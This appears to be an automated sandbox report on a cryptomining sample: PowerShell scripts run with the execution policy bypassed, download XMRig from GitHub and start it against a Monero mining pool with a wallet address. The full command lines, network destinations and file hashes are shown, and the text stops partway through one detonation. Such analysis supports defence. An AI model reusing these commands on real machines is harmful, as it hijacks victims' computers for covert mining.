Malware Analysis Report

2025-01-06 18:14

Sample ID 240527-w4bwvsdc5y
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 18:28

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240426-en

Max time kernel

148s

Max time network

128s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4256-0-0x00007FFFE77F3000-0x00007FFFE77F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wemurumi.oxc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4256-9-0x0000013B64B00000-0x0000013B64B22000-memory.dmp

memory/4256-10-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

memory/4256-11-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

memory/4256-12-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

memory/4256-15-0x0000013B64BA0000-0x0000013B64BAA000-memory.dmp

memory/4256-14-0x0000013B64BB0000-0x0000013B64BC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4808-46-0x0000026305080000-0x00000263050A0000-memory.dmp

memory/4808-47-0x00000263069C0000-0x00000263069E0000-memory.dmp

memory/4808-48-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-49-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-53-0x0000026306A00000-0x0000026306A20000-memory.dmp

memory/4808-52-0x00000263069E0000-0x0000026306A00000-memory.dmp

memory/4256-51-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

memory/4256-50-0x00007FFFE77F3000-0x00007FFFE77F5000-memory.dmp

memory/4256-54-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

memory/4808-55-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-56-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-57-0x00000263069E0000-0x0000026306A00000-memory.dmp

memory/4808-58-0x0000026306A00000-0x0000026306A20000-memory.dmp

memory/4808-59-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-60-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-61-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-62-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-63-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-64-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-65-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-66-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-67-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

memory/4808-68-0x00007FF61ABC0000-0x00007FF61B7F3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

149s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp

Files

memory/4616-3-0x00007FF804D63000-0x00007FF804D64000-memory.dmp

memory/4616-6-0x000001ACF58B0000-0x000001ACF58D2000-memory.dmp

memory/4616-9-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-10-0x000001ACF5BC0000-0x000001ACF5C36000-memory.dmp

memory/4616-11-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aboefp24.b31.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4616-29-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-52-0x000001ACF5B80000-0x000001ACF5B92000-memory.dmp

memory/4616-65-0x000001ACF5910000-0x000001ACF591A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3568-94-0x0000024979CB0000-0x0000024979CD0000-memory.dmp

memory/3568-95-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-96-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/4616-97-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-98-0x00007FF804D63000-0x00007FF804D64000-memory.dmp

memory/4616-99-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4616-100-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/3568-101-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-102-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-103-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-104-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-105-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-106-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-107-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-108-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-109-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-110-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-111-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

memory/3568-112-0x00007FF76C790000-0x00007FF76D3C3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

148s

Max time network

144s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

memory/4676-3-0x00007FFFC2E03000-0x00007FFFC2E04000-memory.dmp

memory/4676-5-0x000001D35E570000-0x000001D35E592000-memory.dmp

memory/4676-7-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-10-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-11-0x000001D377780000-0x000001D3777F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eio0uzra.zar.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4676-27-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-51-0x000001D376BF0000-0x000001D376C02000-memory.dmp

memory/4676-64-0x000001D35E5A0000-0x000001D35E5AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 177315780a5666331df5331dd2fcc6af
SHA1 30a8d1f9da56672fe3d9d9244d527639b0c533c5
SHA256 c2df3af3b509745774cbc74f3b49263bcdde67b3e0fb97494167710d93b75f74
SHA512 3da3ad7542fc6ba1abd66b96acc02b913bba50c6392b78c195e933917ab8815e8721ef5c95884459be7a3c9ba48529c087e31974d5318e9651ba236c633d073d

memory/1340-93-0x00000264CE520000-0x00000264CE540000-memory.dmp

memory/1340-94-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/4676-95-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-97-0x00007FFFC2E03000-0x00007FFFC2E04000-memory.dmp

memory/1340-96-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/4676-98-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-99-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/1340-100-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-101-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-102-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-103-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-104-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-105-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-106-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-107-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-108-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-109-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-110-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

memory/1340-111-0x00007FF780F90000-0x00007FF781BC3000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240508-en

Max time kernel

150s

Max time network

158s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1140-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jk5x2vis.ewr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1140-9-0x00000227F5B10000-0x00000227F5B32000-memory.dmp

memory/1140-10-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/1140-11-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/1140-12-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/1140-14-0x00000227F5BB0000-0x00000227F5BC2000-memory.dmp

memory/1140-15-0x00000227F5BA0000-0x00000227F5BAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3556-46-0x0000021EB19F0000-0x0000021EB1A10000-memory.dmp

memory/3556-47-0x0000021EB3510000-0x0000021EB3530000-memory.dmp

memory/1140-49-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

memory/3556-48-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/1140-50-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/3556-53-0x0000021EB3550000-0x0000021EB3570000-memory.dmp

memory/3556-52-0x0000021EB3530000-0x0000021EB3550000-memory.dmp

memory/3556-51-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-54-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-55-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-57-0x0000021EB3550000-0x0000021EB3570000-memory.dmp

memory/3556-56-0x0000021EB3530000-0x0000021EB3550000-memory.dmp

memory/3556-58-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-59-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-60-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-61-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-62-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-63-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-64-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-65-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

memory/3556-66-0x00007FF764F60000-0x00007FF765B93000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
